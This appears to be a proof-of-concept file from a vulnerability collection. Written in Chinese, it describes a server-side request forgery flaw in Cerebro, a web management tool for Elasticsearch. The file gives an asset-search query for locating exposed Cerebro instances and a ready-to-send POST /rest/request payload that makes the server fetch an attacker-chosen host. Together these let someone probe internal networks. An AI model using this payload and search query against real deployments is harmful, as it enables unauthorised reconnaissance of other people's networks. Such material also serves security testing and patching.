Awesome-POC/Web应用漏洞/Cerebro request SSRF漏洞.md
2024-11-06 14:10:36 +08:00

33 lines
754 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cerebro request SSRF漏洞
## 漏洞描述
Cerebro是使用Scala、Play Framework、AngularJS和Bootstrap构建的开源的基于Elasticsearch Web可视化管理工具。您可以通过Cerebro对集群进行web可视化管理如执行rest请求、修改Elasticsearch配置、监控实时的磁盘集群负载内存使用率等。其中某功能存在SSRF漏洞攻击者通过发送特定的请求包可以探测内网信息
## 漏洞影响
```
Cerebro
```
## 网络测绘
```
app="Cerebro"
```
## 漏洞复现
主页面
![image-20220524143249335](images/202205241432380.png)
发送请求包
```
POST /rest/request
{"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"}
```
![](images/202205241433022.png)